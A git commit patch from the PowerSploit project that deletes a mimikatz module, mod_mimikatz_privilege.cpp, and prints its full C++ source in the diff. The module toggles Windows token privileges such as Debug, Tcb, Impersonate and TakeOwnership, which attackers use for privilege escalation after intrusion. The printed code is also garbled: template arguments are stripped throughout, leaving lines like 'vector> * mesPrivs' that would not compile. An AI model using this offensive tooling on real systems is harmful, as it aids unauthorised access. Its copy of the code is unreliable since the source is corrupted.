From c5168cdba6a3b2d7dd8d79c8ac9583d3ace6a504 Mon Sep 17 00:00:00 2001
From: mattifestation
Date: Mon, 3 Feb 2014 17:13:35 -0500
Subject: Removed mimikatz. This doesn't need to reside in PowerSploit. Those that are truly paranoid should validate that the embedded executable in Invoke-Mimikatz.ps1 is indeed mimikatz. This was causing AV to flag upon downloading PowerSploit.
---
 .../mimikatz/modules/mod_mimikatz_privilege.cpp | 167 ---------------------
 1 file changed, 167 deletions(-)
 delete mode 100644 Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_privilege.cpp
(limited to 'Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_privilege.cpp')
diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_privilege.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_privilege.cpp
deleted file mode 100644
index 1b29486..0000000
--- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_privilege.cpp
+++ /dev/null
@@ -1,167 +0,0 @@
-/* Benjamin DELPY `gentilkiwi`
- http://blog.gentilkiwi.com
- benjamin@gentilkiwi.com
- Licence : http://creativecommons.org/licenses/by/3.0/fr/
-*/
-#include "mod_mimikatz_privilege.h"
-#include "..\global.h"
-
-vector mod_mimikatz_privilege::getMimiKatzCommands()
-{
- vector monVector;
- monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(list, L"list", L"Liste les privilèges"));
- monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(enable, L"enable", L"Active un ou plusieurs privilèges"));
- monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(remove, L"remove", L"Retire un ou plusieurs privilèges"));
- monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(disable, L"disable", L"Désactive un ou plusieurs privilèges"));
- /* Raccourçis */
- monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(debug, L"debug", L"Demande (ou désactive) le privilège Debug"));
- monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(security, L"security", L"Demande (ou désactive) le privilège Security"));
- monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(tcb, L"tcb", L"Demande (ou désactive) le privilège Tcb"));
- monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(impersonate, L"impersonate", L"Demande (ou désactive) le privilège Impersonate"));
- monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(assign, L"assign", L"Demande (ou désactive) le privilège AssignPrimaryToken"));
- monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(shutdown, L"shutdown", L"Demande (ou désactive) le privilège Shutdown"));
- monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(takeowner, L"takeowner", L"Demande (ou désactive) le privilège TakeOwnership"));
- return monVector;
-}
-
-bool mod_mimikatz_privilege::enable(vector * arguments)
-{
- bool reussite = multiplePrivs(arguments, SE_PRIVILEGE_ENABLED);
- return true;
-}
-
-bool mod_mimikatz_privilege::remove(vector * arguments)
-{
- bool reussite = multiplePrivs(arguments, SE_PRIVILEGE_REMOVED);
- return
true;
-}
-
-bool mod_mimikatz_privilege::disable(vector * arguments)
-{
- bool reussite = multiplePrivs(arguments, 0);
- return true;
-}
-
-bool mod_mimikatz_privilege::simplePriv(wstring priv, vector * arguments)
-{
- bool ajout = arguments->empty();
-
- (*outputStream) << L"Demande d" << (ajout ? L"\'ACTIVATION" : L"e RETRAIT") << L" du privilège : " << priv << L" : ";
-
- vector> * mesPrivs = new vector>;
- mesPrivs->push_back(make_pair(priv, ajout ? SE_PRIVILEGE_ENABLED : 0));
-
- bool reussite = mod_privilege::set(mesPrivs);//, INVALID_HANDLE_VALUE);
- delete mesPrivs;
-
- if(reussite)
- (*outputStream) << L"OK";
- else
- (*outputStream) << L"KO ; " << mod_system::getWinError();
- (*outputStream) << endl;
-
- return reussite;
-}
-
-bool mod_mimikatz_privilege::multiplePrivs(vector * privs, DWORD type)
-{
- bool reussite = false;
- vector> * mesPrivs = new vector>;
- for(vector::iterator monPrivilege = privs->begin(); monPrivilege != privs->end() ; monPrivilege++)
- {
- mesPrivs->push_back(make_pair(*monPrivilege, type));
- }
- reussite = mod_privilege::set(mesPrivs);
- delete mesPrivs;
-
- if(reussite)
- (*outputStream) << L"OK";
- else
- (*outputStream) << L"KO ; " << mod_system::getWinError();
- (*outputStream) << endl;
-
- return reussite;
-}
-
-
-bool mod_mimikatz_privilege::list(vector * arguments)
-{
- vector> * mesPrivs = new vector>;
-
- if(mod_privilege::get(mesPrivs))//, INVALID_HANDLE_VALUE))
- {
- for(vector>::iterator monPrivilege = mesPrivs->begin(); (monPrivilege != mesPrivs->end()) ; monPrivilege++)
- {
- (*outputStream) << setw(35) << setfill(wchar_t(L' ')) << left << monPrivilege->first << right << L'\t';
-
- if(monPrivilege->second & SE_PRIVILEGE_VALID_ATTRIBUTES)
- {
- if(monPrivilege->second & SE_PRIVILEGE_ENABLED_BY_DEFAULT)
- {
- (*outputStream) << L"ENABLED_BY_DEFAULT ";
- }
-
- if(monPrivilege->second & SE_PRIVILEGE_ENABLED)
- {
- (*outputStream) << L"ENABLED ";
- }
-
- if(monPrivilege->second & SE_PRIVILEGE_REMOVED)
- {
- 
(*outputStream) << L"REMOVED ";
- }
-
- if(monPrivilege->second & SE_PRIVILEGE_USED_FOR_ACCESS)
- {
- (*outputStream) << L"USED_FOR_ACCESS ";
- }
-
- if(monPrivilege->second & SE_PRIVILEGE_REMOVED)
- {
- (*outputStream) << L"REMOVED";
- }
- }
-
- (*outputStream) << endl;
- }
- }
- else (*outputStream) << mod_system::getWinError() << endl;
-
- return true;
-}
-
-
-bool mod_mimikatz_privilege::debug(vector * arguments)
-{
- simplePriv(SE_DEBUG_NAME, arguments); return true;
-}
-
-bool mod_mimikatz_privilege::security(vector * arguments)
-{
- simplePriv(SE_SECURITY_NAME, arguments); return true;
-}
-
-bool mod_mimikatz_privilege::tcb(vector * arguments)
-{
- simplePriv(SE_TCB_NAME, arguments); return true;
-}
-
-bool mod_mimikatz_privilege::impersonate(vector * arguments)
-{
- simplePriv(SE_IMPERSONATE_NAME, arguments); return true;
-}
-
-bool mod_mimikatz_privilege::assign(vector * arguments)
-{
- simplePriv(SE_ASSIGNPRIMARYTOKEN_NAME, arguments); return true;
-}
-
-bool mod_mimikatz_privilege::shutdown(vector * arguments)
-{
- simplePriv(SE_SHUTDOWN_NAME, arguments); return true;
-}
-
-bool mod_mimikatz_privilege::takeowner(vector * arguments)
-{
- simplePriv(SE_TAKE_OWNERSHIP_NAME, arguments); return true;
-}
\ No newline at end of file
-- 
cgit v1.2.3